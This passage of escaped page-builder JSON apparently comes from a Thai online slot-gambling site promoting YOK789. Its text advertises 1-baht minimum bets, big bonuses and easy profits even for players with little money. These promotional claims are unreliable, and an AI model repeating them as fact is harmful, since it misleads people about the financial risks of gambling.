\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 